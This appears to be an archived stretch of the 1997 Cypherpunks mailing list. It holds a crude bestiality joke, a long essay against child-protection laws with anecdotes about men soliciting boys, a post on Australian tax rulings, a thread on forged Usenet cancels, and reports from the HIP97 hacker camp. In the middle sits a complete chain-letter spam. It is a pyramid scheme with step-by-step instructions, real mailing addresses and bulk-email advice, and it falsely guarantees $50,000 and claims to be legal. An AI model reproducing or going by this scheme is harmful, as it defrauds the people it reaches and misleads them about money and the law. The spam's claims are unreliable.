down this site because they don't like its name and/or contents. The only problem I have with the net.scum site is that thay don't follow there own policies. Thay clame that thay will only remove a person if thay make a stament regecting the cabal, deamonising spam cancelers, ect I have made no such stament and thay removed me from there lists. > David, with all due respect, I got more interesting things to research > than your sexuality! :-) After all that "Person X is a pedaphile" I thourt it could have been a hoddy or something :D > [2] Have any of the "others" been kangaroos? No there too high sprung for me. (Pity though 'roos have two virginas, care to double your fun :D) - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+w5w6QK0ynCmdStAQFzcAP/eskH8Kry1D3rcTdgf0vdor0TbqQAhBPU 9hzqY4VMgQv8e4qtIXH4zDbHVqRZlO107K8smLyCXhXegPg+zSb9jqi0fMbxGpoG uJiOuOGRnDCNAYNK3yk0vvHSaxR3kZwYAteOwY+ieSB6QjuDbavYcXg5SLfinkmH ayM80IhTvr0= =zGqG -----END PGP SIGNATURE----- From nobody at REPLAY.COM Sat Aug 9 07:25:23 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Aug 1997 22:25:23 +0800 Subject: New Thread? / Re: Apology from me to the list and TruthMonger Message-ID: <199708091402.QAA20908@basement.replay.com> David Downey wrote: > > LOL, all right, all right. I'll take my lickings and like it. OK. Now that we've got that settled, what shall we talk about next, Abortion or Ebonics? > I do not > know how to word where I stand because I take a little from each side as > to what is the correct way to handle these issues. On its face, this is not an unreasonable concept. As I see it, the reason for the 'Fuck Compromise' stance being so heartily proclaimed on the list is not because CypherPunks see compromise as inherently evil, but because of the recognition that compromise that is beneficial to both parties requires honesty and integrity on the part of both parties. Compromise at the point of a gun is weakness, not wisdom, and every step one loses is twice as hard to regain in the future. The classic example is Hitler, who "only wanted Austria." Then he "only wanted Poland." The government claimed they only wanted to ban the *bad* guns, but as Tim May pointed out, now it is theoretically illegal in some places for a citizen to carry a paring knife home from the store. Of course, in practice, these laws will only be used against *bad* people. Mary Tyler Moore has nothing to worry about. > I believe in fighting for what one believes in. I firmly > believe in protecting the children and guiding them towards an > understanding of today's world in *all* it trappings. I am also unsure > as to the correct and "right" way to do this. I am open to suggestions, > and am willing to openly contribute my own. The fallacy that creates more problems than it solves is that there *is* a "right" way to do things. Life is a crapshoot, and the most we can hope for is to use our best judgement to minimize whatever ill effects might occur as the result of haphazard circumstance. Sadly, our society has been moving further and further toward a fascist, control-freak mentality which dictates that there are clear lines between right and wrong actions, attitudes and beliefs. Even more sadly, society is crying out for stiff punishment in every niggardly aspect of life, including the areas which are beyond the control of those involved. An example is the woman in New York (?) who went to get food for her baby, and the dog killed/ate the baby while she was gone. The masses called for her head on a platter and she was charged with manslaughter (or whatever). I am certain that those who could afford a nanny to take care of their children had enough time on their hands to write a letter to the editor to call for the woman's imprisonment. I would not be surprised to find that some of those letters to the editor were of the opinion that, if the mother had no bread for the baby, then she should have let the baby "eat cake." I couldn't help but think of this poor woman who had lost the child that she was trying to feed and nurture. Did she need to be 'punished' because her options were limited by her position in life? I don't know all the details of her situation, but I do know that neither the media nor the masses seemed to care about the details--they just wanted blood. I would wager that there are far more children who die in the company of their mother in a bad neighborhood, than those who are eaten by the family dog. I would also wager that if the Clinton's cat killed and ate Chelsea, that there would be no charges pending. Which is the "right" choice--to take your child with you and have him/her die when you are mugged--to leave your child at home and have the dog eat him/her? Which is the "right" choice--to allow your child to learn about kinky sex techniques and then die when they try hanging themself from the ceiling and standing on a chair--to "protect" them from exposure to *trash* such as this, and then they die by suffocation when their sex-partner tells them semi-strangulation enhances sex, because they've never encountered information about it which also mentions that it may be dangerous? If you beat your child in order to prevent them from doing what you feel will be harmful to them, then society will put you in jail. If you beat them psychologically, with guilt, and they kill themself out of shame when they do something *bad*, society will give you sympathy. Which is the "right" way to teach your children to avoid things which will harm them? There *isn't* a "right" way. Before your child can understand speech, you can't protect them from touching a hot stove by "telling" them not to. Is it "wrong" to slap their hand when they reach for it? Once they *do* know how to understand what you are telling them, slapping their hand may not be the best way to keep them from harm. The bottom line is that you have to use your best judgment about issues such as these, and you will never be "right." You will merely be doing the best that you can. If you don't care about making the effort to protect your children and they never touch a hot stove, it does not make you a "good" parent. If you care immensely, and do everything you are capable of to protect your children and they *do* touch a hot stove, it does not make you a "bad" parent. It is human nature that if you take your child to the park to enrich their life, and they get killed by a meteor falling from the sky, you may find yourself "blaming" yourself, saying, "If only I hadn't taken him/her to the park!" This is part of life, and part of being human. However, when others decide that you should be imprisoned for child endangerment for taking your child outside when a single astronomer in China told the media that a meteorite "might" be on the way, then there is something seriously wrong with society. Is this a ridiculous example? Sure it is...just like someone claiming that they were justified in raping someone because their slip was showing, so they were "asking for it." The point I am trying to make is that there are no ridiculous examples. Moose Jaw, Saskatchewan, once had a law that required pedestrians to walk on the right side of the sidewalk. This was a fairly recent event. Insane? Yes, and City Council eventually figured out that they were idiots, but if someone's child had died when bumping into someone while their parent was walking them on the "wrong side" of the sidewalk, the parent would have been legally guilty of child endangerment. The "Big Lie" that we tell ourselves is that we can guarantee our safety and security, and that of our children, if we just pass enough laws against things that are "wrong." If we can just figure out who is "to blame" for society's ills and imprison them. The guy who sold you the "junk bonds" might well have cost you less money than the long-term government bonds you bought just before inflation went through the roof. Who is the "right" person to put in jail, and who is the "wrong" person to put in jail? Truthfully, the "right" person to put in jail may well be *you*. It might "protect" you from making bad financial decisions. I don't want your child to get molested by a pedophile. I don't want your child to die of a heroin overdose. But I don't want a video camera mounted in my home to monitor my activities in an attempt to keep your child from coming to harm, either. A solution to protecting the citizens is to put them in prison and keep the criminals on the outside. Really! We would be protected by the security of concrete walls and locked doors. Is the "right" thing to do to put your child in prison? I think you know better than that. Some children are going to be molested, some are going to be abused and/or murdered, some are going to walk willingly, and perhaps ignorantly, into bad situations that will lead them to suffer irrepairable harm. I don't want this for your child, or for any child, but I truly don't believe that they can be protected by making the lives of everyone so regulated and restricted that our life energy is drained from us by effectively imprisoning our spirit. When I was a child, there was a local priest named Father Flanigan who enjoyed the company of young boys. He regularly offered to take them to out-of-town hockey games, supervise them in their parent's absence, etc. When he offered to take myself and several other young boys to an out-of-town game, my parents allowed me to go with him, but they also made a point of telling me not to let him put his hand down my pants. The fact of the matter is, the trip enriched my life, and Father Flanigan did many good things for the youth of my community. Did he "molest" any of them? I don't know. He didn't molest me, or anyone I know of. Were my parents "bad" parents? No, they were *great* parents. They "protected" me by making their best judgement and giving me the information they felt I needed in order to use my own judgment effectively. Did my parents "endanger" me by allowing me to go with Father Flanigan? Sure, they did. They also endangered me by allowing me to go outside and risk getting hit by a falling meteor. Was Father Flanigan a pedophile? I don't know. Was he a pedophile, but non-active? I don't know. Did my parents know? Perhaps, perhaps not. I wouldn't doubt that they may have asked him about his fondness for young boys, or talked to those in a position to know, or perhaps they merely used their own best judgement. Or, it could be that they and I are way off base, merely being prejudiced by anti-Catholic views promoted by those with an axe to grind against differing religious views. Regardless, when I was thirteen, I was approached by a guy who stepped out of an alley and offered me $20.00 to let him give me a blow-job. I politely declined, and went on my way. I spent about an hour at home with my family, without giving the event much thought. However, at some point it occurred to me that there were children younger than myself who might be more vulnerable to the man's approach, and that, while he had not used any force or pressure in the situation, that it was possible that this could occur with a smaller child. I asked my mother if there was a law against adults offering children money to let the adult give them a blow-job. She was startled by my question, though she hid it as best she could, but she was also amused that I was so casual about asking it. She dealt with the situation matter-of-factly, and I went with a policeman to help him find the man. The policeman chased him down, subdued him, and took him to jail. To tell the truth, I felt compassion for the man, since I sensed that he was a tortured individual, and he had not really done anything that 'violated' me, or 'infringed' on my right to self-determination (although I would not have been able to verbalize these feelings at the time). Looking back on the event, I realize that, strictly speaking, I did not take a course of action that would lead to his being judged and punished for what he did, but rather, for what he "might" do. Was I "right" or "wrong" in subjecting someone who did not do any harm to me to arrest and imprisonment? I don't know. It could very well be the man never had, and never would, force himself on a child, or exert undue pressure on a child in order to coerce the child into doing something against their will. Can my actions be deemed "right" or "wrong," depending on the "odds" of him forcing himself on a child, versus being of strong enough character not to do evil to satisfy his desires? In retrospect, I believe I made my decision to act based on the fact that I sensed that the man was not totally in control of basing his actions only on his best rational judgement. It could be that I had him wrongly imprisoned, or it could be that I saved him from doing something he would regret for the rest of his life. The irony of this story is that the local police solved their "problem" with this man by buying him a bus ticket to a small town nearby. End of problem... It is my belief that this "solution" to the local police's "problem" is illustrative of the attempts of censors and regulators to "shift" the problems instead of "solving" them. I could be dead in a ditch because my parents allowed me to go with a priest who had a fondness for children. I could also be dead in a ditch because my parents "protected" me from being exposed to recognizing the reality of adults who are fond of children, and I might not have had enough information to deal properly with the guy who stepped out of the alley. Which legislation do we pass to protect our children? Do we pass legislation "preventing" parents from allowing their children to accompany an adult who is fond of children, or do we pass legislation "requiring" parents to allow their children to accompany an adult who is fond of children, but who will enrich their lives and help them to understand the difference between controlling one's urges versus violating others in order to satisfy themself? The reality of the current state of affairs is that there are a plethora of laws which prevent parents from making their own decisions as to how to live their lives and how to raise their children to the best of their ability. If you know that you need to slap your child's hand in order to keep them from touching a hot stove, will you do so? What if you also know that Child Services will take away your child and put them in an orphanage if you do so? Is your child better off having a deformed hand and living at home in a loving environment, or having a normal hand and being raised by strangers who don't care for him/her? Laws aren't going to universally protect our children, nor are rating systems, or lynchings. Nor, sadly, the best judgement of concerned, loving parents. We can't solve the problems of life by passing legislation that attempts to control everyone and everything, forcing us all to meet standards that may be based on erronious beliefs and/or information. There are laws against murder. People still get murdered. Punishment may be justified for the act of murder, but it is not the "solution" to preventing murder. We can't legislate away poverty, destitution, and desperation. Making "anger" illegal won't prevent it. Making "embarassment" illegal won't stop people from blushing. We are increasingly shifting "social" problems into the arena of "legal" remedy. We "liberate" the mentally ill from their confinement in nuthouses, and then we "imprison" them for peeing in an alley because they live on the streets. We pass laws limiting political campaign contributions, and then we vote for the person who spends $50,000,000 on ads telling us what an asshole their opponent is. We allow doctors to give their patients heroin in order to relieve their suffering, and we deny an Ambassadorship to someone who believes that a doctor should be able to give his patients marijuana to relieve their suffering. Yes, I care about other people, and I care about children. I am not selfishly clinging to my rights to privacy and freedom in order to further my own interests at the expense of others. I am doing so because I don't believe that the world will be a better place if my rights and freedoms are taken away. Then again, I'm Chinese...I could be "Wong." TruthMonger From apache at bear.apana.org.au Sat Aug 9 07:44:26 1997 From: apache at bear.apana.org.au (Apache) Date: Sat, 9 Aug 1997 22:44:26 +0800 Subject: State Governments Cash In On Illegal Taxes Message-ID: <199708091415.AAA03906@bear.apana.org.au> -----BEGIN PGP SIGNED MESSAGE----- Following the the ruling of the High Court of Australia finding that billions of dollars in taxation revenue collected by the states was illegal and unconstitutional the Premiers of Victoria and NSW have made statements that their respective governments will not be refunding the unlawfully collected taxes paid in advance by certain hoteliers. To do so would be an unjust windfall the Premiers said. The governments continue to act unlawfully collecting 'taxes' with no lawful or constitutional basis. The government of Queensland today in a press statement advised it would be returning any unlawfully imposed taxes paid in advance. No mention was made of any intention to refund taxes previously collected but not paid in advance. - -- .////. .// Charles Senescall apache at bear.apana.org.au o:::::::::/// >::::::::::\\\ PGP mail preferred Brisbane AUSTRALIA '\\\\\' \\ Apache -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBM+x7cHawhvoxf0r9AQHmlwf+PGKn7C8MK1O/JaVwAwXNxkTHjpY1aTU1 CqYQXnuA4mhGNonTjMjsfjE9+M6rVgBq2o28EwtVm++yGR/DmNWjzCgv2pgzwqld wpDsFaLQBUN60lh2XrXVYNXTf3ipaO3F9f68t/sFJCOquui0NAjapO254ZPyHt9b +kjk1DRnG1V7mVpVRcL3hd1RBWkNTBCa/1bucvrEUPsav+17jgfnje3yDPoPf6KC o5e33YZoY3JoamGrejnEoWDXBrAucGJfGeqDjfG+6Ymz4RNSL2EKe7KtTgrtbXHo mN+i3uwVDBPjZsF/iiEoCQ5kwUSead5SkuZu/uUFSk52C5L+544Cgg== =AFmN -----END PGP SIGNATURE----- From aan322b at aol.com Sat Aug 9 22:45:10 1997 From: aan322b at aol.com (aan322b at aol.com) Date: Sat, 9 Aug 1997 22:45:10 -0700 (PDT) Subject: This Is Working!!!!Now!! Message-ID: <667093365411.Gv33t5@aol.com>

From:aan322b at aol.co

Dear Friend,

The following opportunity is one you may be interested in taking a look at. 
It can be started with  MINIMAL OUTLAY and the income return is Tremendous!


                             "The computer what an amazing machine"....



You are about to make at least $50,000- in less than 90 days
Please read the enclosed program then read it again.

You are looking at the most amazing program you have ever seen! I received
this E-Mail at least 2 times read it and deleted it. The third time I received it....
I knew I had to give this a chance. I was right. THIS IS WORKING NOW!

This is a money making PHENOMENON. Print this letter for future use.
Read the Program......Then Read It Again<<<

This is a legitimate legal money making opportunity. It does not require you to come
in contact with people. Or to perform any task that you can not easily master.

It has demonstrated and proven its ability to generate large sums of money.
This program is showing fantastic appeal with an ever increasing population 
That just continues to expand. This is probably not the first time you are seeing
this which is obviously  one of the most, indeed maybe the most, exciting proof
that this program is working right now. Couple that with these easily verifiable facts.

1- Only 35% of all the homes in the US have a computer in them as of now.
2-100,000 people are joining us online every month.
3-The last two facts quoted continue to rise steadily.

Thousands of people have used this program to raise capital to start their own 
business, pay off debts, buy homes, cars, etc., even retire!
This is your chance ! So don't pass it up. 

Remember this is not a chain letter, It can not be broken, It works 100% every time.
How ever you must follow the instructions exactly for the best results. Change nothing
this works exceedingly well as it is now. I sincerely hope that you will choose to experience in the next 2 to 3 months what I have been experiencing for the past
3 months. Do you have any idea what it is like to be suddenly able to say, Hold
everything, I am taking some control of my own life back for the pure and simple reason that now thanks to this program I am financially able to do just that. Alter
the course of my life..

THREW IT AWAY

"I had received this program before. I threw it away, But later wondered if I shouldnt have given it a try. Of course I had no Idea who to contact to get a copy, So I had to wait
until I was E-mailed another copy of the program. Eleven months passed,
Then it came. I DIDN'T throw this one away. I made $41,000 on the first try."
 
                                                                                                     Dawn W., Evansville, IN

NO FREE LUNCH

"My late father always told me, "remember Alan, There is no free lunch in life.
You get out of life what you put into it " Through Trial and Error and a somewhat
frustrating start, I finally figured it out. The Program works very well, I just had to find the right target group of people to e-mail it to. So far this year I have made over
 $63,000 using this program. I know my dad would have been very proud of me.

                                                                                                     Alan B., Philadelphia, PA

P.S.

"Do you have any idea what 11,700 $5 bills ($58,000) look like piled up on a kitchen
table? Its AWESOME.

                                                                                                 Christopher Erickson.

         A Personal Note From The Originator Of This Program

 By the time you have read the enclosed information and looked over the enclosed
program and reports. You should have concluded that such a program,and one that is legal, Could not have been created by an amateur.

Let me tell you a little about my self. I had a profitable business for ten years. Then in
1979 my business began falling off. I was doing the same things that were previously successful for me, but it wasn't working.Finally, I figured out. It was the economy. Inflation and recession had replaced the stable economy that had been with us since 1945. I don't have to tel you what happened to the unemployment rate... because many of you know from first hand experience. There were more failures and bankruptcies than ever before.

   The middle class was vanishing. those who knew what they were doing invested wisely and moved up. Those who did not, including those who never had anything to save or invest, were moving down into the ranks of the poor. As the saying goes
"THE RICH GET RICHER AND THE POOR GET POORER". The traditional methods of making money will never allow you to "move up" or "get rich", inflation will see to that.


You have just received information that can give you financial freedom for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT". You can make more
money in the next few months than you have ever imagined. 

Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way.
It works exceedingly well as is now . 
Remember to E-mail a copy of this exciting program to every one that you can think of.
One of the people you send this may send out 50,000...and your name will be on everyone of them!. Remember though, the more you send out , the more potential customers you will reach.

So my friend, I have given you the ideas,information,materials and opportunity to become financially independent, IT'S UP TO YOU NOW!


                   HERES HOW THIS AMAZING PROGRAM will MAKE YOU$$$$$$$

Lets say that you decide to start small, just to see how it goes and we'll assume you
and all those involved send out 2000 programs each. Lets also assume that the mailing receives a .5% response. Using a good list the response could be much better. Also many people will send out hundreds of thousands of programs instead
of 2000. But continuing with this example, You send out only 2000 programs with
a 5% response, That is only 10 orders for REPORT#1. those ten people respond by 
sending out 2000 programs each for a total of 20,000. Out of those .5%, 100 people
respond and order REPORT#2. Those 100 mail out 2000 programs each for a total of 200,000. The.5% response to that is 1000 orders for REPORT#3. Those 1000 send out 2000 programs each for a 2,000,000 total. The .5% response to that is 10,000 
orders for REPORT#4. That's 10,000 Five Dollar Bills for you. CASH!!!!
Your total income in this example is $50 +$500+5000+ $50,000
 for a total of  $55,550 !!!!!!!!


REMEMBER FRIEND, THIS IS ASSUMING THAT 1990 OUT OF 2000 PEOPLE YOU
MAIL TO DO ABSOLUTELY NOTHING......AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE OR HALF SENT OUT
100,000 PROGRAMS INSTEAD OF 2000.

Believe me, many people will do that and more,! by the way, your cost to participate in this is practically nothing. You obviously already have an internet connection and E-mail is FREE!!!  REPORT#3 Will show you the best methods for Bulk E-Mailing
and purchasing E-Mail lists.


        THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY

It does not require you to come into contact with people , do any hard work, and best
of all, you never have to leave the house except to get the mail. If you Believe that some day you will get that big break that you have been waiting for,THIS IS IT!
Simply follow the instructions, And your dream will come true.
this Multi Level E-Mail order marketing program works perfectly...100%EVERY TIME.
E-Mail is the sales tool of the future. Take advantage of this non commercialized
method of advertising NOW!!!!! The longer you wait, the more people will be doing business using E-mail. Get your piece of this action!!!


MULTI-LEVEL MARKETING has finally gained respectability. It is being taught in the
Harvard Business School, And both Stanford research and the Wall Street Journal
have stated that between 50% and 65% of all goods and services will be sold throughout Multi Level Methods by the mid to late 1990's.
This is a Multi-Billion Dollar industry and of 500,000 millionaires in the US, 20% 
(100,000) Made their fortune in the last several years in MLM. Moreover, Statistics
show 45 people become Millionaires everyday through Multi-Level Marketing.


INSTRUCTIONS:

You are now reading a method of raising capital that works 100% EVERY TIME.
Please read the program carefully.

Step 1: Order all FOUR REPORTS (4) Listed by Name and Number
do this by ordering the REPORT from each of the four(4) names listed on the next
page. For each REPORT, send $5 CASH and a Self Addressed Stamped Envelope,
BUSINESS SIZE #10 To the person listed for the SPECIFIC REPORT. it is essential
that you specify the NAME and NUMBER of the report requested to the person you are ordering from. You will need ALL FOUR REPORTS because you will be REPRINTING and RESELLING them. DO NOT alter the names or sequence other than what the instructions say. IMPORTANT : always provide same day service on all orders.

Step 2: Replace the name and address under REPORT#1 with yours, moving the one that was there down to REPORT#2. drop the name and address under REPORT#2
to REPORT#3, moving the one that was there to REPORT#4. The name and address that was under REPORT#4 is dropped from the list and this party is no doubt on the
way to the bank. When doing this, Make sure you type the names and addresses
ACCURATELY!!!!!
DO NOT MIX UP MOVING PRODUCT/REPORT POSITIONS!!!!!!

Step 3: Having made the required changes in the NAME list save it as a text (.txt) file
in It's own directory to be used with what ever E-Mail program you like. Again, REPORT#3 will tell you the best methods of Bulk E-mailing and acquiring e-mail
lists.


Step 4: E -mail a copy of the entire program(all of this is very important) to everyone
whose address you can get your hands on. Start with friends and relatives since you can encourage them to take advantage of this fabulous money making opportunity. That's what I did and they love me now, more than ever. Then, E -mail
to any one and everyone! use your imagination! You can get E-mail addresses from
companies on the internet who specialize in E-Mail mailing lists. These are very cheap, 100,000 addresses for around $35.

IMPORTANT:
You will not get a good response if you use old lists, So always request a FRESH, NEW list. You will find out where to purchase these lists when you order 
all FOUR REPORTS.

REQUIRED REPORTS

*** Order each REPORT by NUMBER and NAME***

ALWAYS SEND A SELF ADDRESSED STAMPED ENVELOPE AND $5 CASH FOR 
EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER.
------------------------------------------------------------------------------------------------------------------
REPORT #1 
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
ORDER REPORT#1 FROM

For Your Eyes Only
7154 N University Drive
#230 
Tamarac, Fl. 33321

--------------------------------------------------------------------------------------------------------------------
REPORT #2
"MAJOR CORPORATIONS AND MULTILEVEL SALES
ORDER REPORT #2 FROM

Infinity Productions
P.O. Box 823654
Dallas, TX. 75382

-------------------------------------------------------------------------------------------------------------------- 
REPORT #3
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM

Retirement Unlimited
3019 S. Norwood AVE.
Independence, MO 64052

--------------------------------------------------------------------------------------------------------------------
REPORT #4
"EVALUATING MULTI-LEVEL SALES"
ORDER REPORT #4 FROM

LaChance Information Systems
P.O. Box 308
Placida, FL. 33946-0308

--------------------------------------------------------------------------------------------------------------------

CONCLUSION

 I am enjoying my fortune that I made by sending out this program.
You too, Will be making money in 20 to 90 days if  you follow the SIMPLE STEPS
outlined in this mailing.

Very few people reach financial independence, because when opportunity knocks
they choose to ignore it. It is much easier to say "NO than YES", and this is the question you must answer. Will YOU ignore this amazing opportunity or will you take
advantage of it? If you do nothing, you have indeed missed something and nothing will change. Please re-read this material this is a very special opportunity.
If you have any questions please feel free to write to the sender of this information.
You will get a prompt and informative reply.

My method is simple. I sell thousands of people a product for $5 that costs me pennies to produce and E-Mail. I should also point out that this program is legal and everyone who participates WILL make money. This is not a chain letter or a pyramid scam. At times you have probably received chain letters, asking you to send money,
on faith, but getting nothing in return. No product what so ever! Not only are chain letters illegal but the risk of some one breaking the chain makes them quite
unattractive.

You are offering a legitimate product to your people. After they purchase the product from you, they reproduce more and resell them.
Its simple free enterprise. As you learned from the enclosed material the PRODUCT 
is a series of FOUR FINANCIAL AND BUSINESS REPORTS. The information contained in these REPORTS will not only help you in making your participation
in this program more rewarding, but will be useful to you in any other business decisions you make in the years ahead. You are also buying the right to reprint
all of the REPORTS, which will be ordered from you by those to whom you mail this program. The concise one and two page REPORTS you will be buying can easily
be reproduced at a local copy center for a cost of about 3 cents a copy.
Best Wishes with this program and Good Luck!


TIPS FOR SUCCESS

Send for your (4) four reports immediately so you will have them when the orders start
coming in. When You receive a $5 order, You must send out the product/service to comply with US Postal and Lottery laws. Title18 sections1302 and 1341 specifically
state that: "A PRODUCT or SERVICE MUST BE EXCHANGED FOR MONEY RECEIVED".


 WHILE YOU WAIT FOR THE REPORTS TO ARRIVE:

1. Name your company. You can use your own name if you like.

2. Get a Post Office Box ( preferred).

3. Edit the names and addresses on the program. You must remember
    Your name and address go next to REPORT#1 and the others all move down one
    with the fourth being bumped OFF the list.

4. Obtain as many E-Mail addresses as possible to send to, until you receive      the information on mailing list companies in REPORT#3.

5. Decide on the number of programs you intend to send out. The more you send,      and the quicker you send them, the more money you will make. 

6. After mailing the programs get ready to fill the orders.

7. Copy the (4) FOUR REPORTS so you are able to send them out as soon as you      receive an order. IMPORTANT: ALWAYS PROVIDE SAME DAY SERVICE ON           ORDERS YOU RECEIVE!


YOUR GUARANTEE:

The check point which GUARANTEES your success is simply this: You must receive
15 to 20 orders for REPORT #1. This is a must!!!  If you don't within the first 2 weeks,
E-Mail out more programs until you do. Then a couple of weeks later you should receive at least 100 orders for REPORT #2 if you don't send out more programs until you do. Once you have received 100 or more orders for REPORT #2, (take a deep breath) you can sit back and relax, Because you are going to make at least $50,000
Mathematically it is a proven guarantee. Of those who have participated in the program and reached the above gurantees ALL have reached their $50,000 goal.
Also, remember every time your name is moved down on the list you are in front of a different REPORT so you can keep track of your program by knowing what people are
ordering from you. IT'S THAT EASY, REALLY, IT IS!!!



"I seem to have been only like a boy playing on the seashore, and diverting myself in now and then finding a smoother pebble or a prettier shell than ordinary, whilst the great ocean of truth lay all undiscovered before me."
                                                                                                     -Sir Isaac Newton
 










From dformosa at st.nepean.uws.edu.au  Sat Aug  9 22:53:40 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sat, 9 Aug 1997 22:53:40 -0700 (PDT)
Subject: forgeries are good for you (was Re: REPOST : Un-forgeable Cancels)
In-Reply-To: <199708081827.TAA01595@server.test.net>
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Aug 1997, Adam Back wrote:

[...]

> But that's cool!  Y shouldn't be able to cancel the forgery ... he
> didn't write it.  

[...]

> I mean this seriously.  People should stop misplacing any value on
> From fields.  You need to use digital signatures to recognize
> persistent personas.

This is true but with everthing there is a trade off between securaty and
efficency.  There are many posts on usenet that are just not worth the
cost of checking there sigs.  If I had to depend only on the sig reather
then having the chouse of only checking the sig on susouse posts I
wouldn't be able to read as much usenet as I do.

> (David = David Formosa?)

Yes.

> What's the point of this?  To provide a way to stop unsophisticated
> forgeries without needing NoCeM support in the client? 

Not mean clients have the capsity to issue NoCeMs,  a lower number of
peaple have anough reputation to issue them.

> I guess it would work well enough, but it's really a bit centralised.

Not realy, when finished I will distrabute the sourse.  The hope is that
we will have a number of compeating retraction servers around the world.

> The operator of the retraction server might be over trusted by a lot
> of people.

True.  But building up that type of trust is possable.

> If the operator turns out to be untrustworthy, or whatever, you're out
> of luck.

No you simply more to the other retraction server.  There will be nothing
unqueek about one server then anouther.

> Also break into his machine and steal his secret key and you could
> have a _lot_ of fun.

This is true of cause.

>  And it's only one machine, what if his security isn't up to much.

Its not going to only be one machine.

> Think decentralised.

We are.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+0dOqQK0ynCmdStAQGU7gP/c9NRABskCeUTF93BhGjEeWVSeKIMG+Ma
TeXXzzKiOcRcUsebBc4smOIprPKmVavwFizH6hmmpr8G8BZZVchaNgCeo1IkeY8w
rdT/WB4i3UUFBVT4l4nToUJPim9GxvNh3YFCK3rkWDza50rrVFN3MFF3FvI2bc1G
7wAgzlMOjX0=
=C/ey
-----END PGP SIGNATURE-----






From rah at shipwright.com  Sat Aug  9 08:32:01 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 9 Aug 1997 23:32:01 +0800
Subject: It's cool to be iang@hip97.nl
Message-ID: 




--- begin forwarded text


Date: 8 Aug 1997 13:12:06 -0000
From: iang at systemics.com
To: e$@thumper.vmeng.com
Subject: It's cool to be iang at hip97.nl
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

Well, sometimes it takes a long time to get a network going, and
sometimes it takes, well, minutes.  Ten minutes ago I wandered
down to the HIP HQ tent and picked up a clothes peg with an IP
number on it, and a slip of paper with some details.

And now I am up and running.  What's more surprising is this a fast
link.  Traceroutes under 10ms are about the best advert I can think
of for XS4ALL, the Dutch provider at the centre of it all.  There's no
flies on the PTT either, with dual 6Mb microwaves and a portable GSM
cell linking this field in the middle of nowhere to central Amsterdam.

It makes you wonder whether this privatisation business is really all
it's cracked up to be.

Lucky Green has done a sterling job as cypherpunk advance campmeister.
When he's not building computer racks out of empty beer bottles (I'm
typing on two crates of real Budweiser!), he's teasing us with a public
key triple DES scrambler.  We're not allowed to use it because we're
not Americans.  But that's cool, as long as we have our SSH and PGP and
we get to empty more beer bottles.

Beer is selling at 4 Hipsters.  Ain't private currencies wonderful :-)

Last night I walked the entire campsite.  Only the clear skys and bright
stars reminded me of a mis-spent youth in the outdoors.  Tents piled
with equipment.  Not the glowflies of Anguilla, but glowing monitors
and flashing leds for our lighting.  Not the sounds of crickets, but
keyboard clicking and "gateway's up" and "who's got address 21" in
multi-lingual hip-speak.

Having got this machine up and going, the only thing I can think of
is to write this email.  But that's ok too, because I'm about to be
booted off.  Squiggle is going to hook up her sonar to Brian the Brain,
the cypherpunk sysadm.  That's for Brian to send out 49.4kHz clicks
so that he knows when to ask for food of passer's by.  Which makes for
two over-worked brains that I can count.

It's cool to be iang at hip97.nl

PS: Brian and friend are at http://www.sabotage.org/mpeg/brain1.jpeg

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Sat Aug  9 08:32:55 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 9 Aug 1997 23:32:55 +0800
Subject: Hipped on PGP
Message-ID: 




--- begin forwarded text


Date: 9 Aug 1997 02:13:36 -0000
From: iang at systemics.com
To: e$@thumper.vmeng.com
Subject: Hipped on PGP
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

HIP finishes late in the day.  It's 0100 - that's one in the morning
for the temporally challenged - and the smart card workshop has just
broken up.

Actually it was the second pass.  The first pass was 'sold out' at 150
people, this second started at 2300 this evening.  Again, 150 people
turned up and sat through presentations of hardware and data formats
and attacks on the financially finest plastic in Europe.

I have no snippets or revelations, I am not one of the dedicated.  Mondex
remains un-hacked, ChipKnip is secure.  Frankly I'm not interested, I find
the world of smart cards deadly boring.  Perhaps it is the hardware, or
maybe because attacks on smart cards have little chance of realising any
gain or meltdown.

I can on the other hand report that Saturn is safe tonight, as our in-HIP
astrodome is busilly monitoring progress.  What better way to wind down
than to head up to north campground and check out the latest telescopic
tracking software.  Speaking of celestial control, the weather is perfect.
That's by California standards, not European.



Dave del Torto was lucky to be joining us for his talk on PGP user security.
After buzzing the bells of the trainee bag scanner with 15kg of portables
and random cables, he was incarcerated in an investigative cell for a couple
of hours.  Many hours after seeing his flight head east, a state department
goon turns up.

"When are you coming back?" asks the goon, knowing full well the
day.  Dave says "the 16th" blithely unaware that his passport expires on the
day before.  Goon leaves, returns, hands over passport.   Only problem was,
passport was cancelled...  No explanation.  No advice, no help.

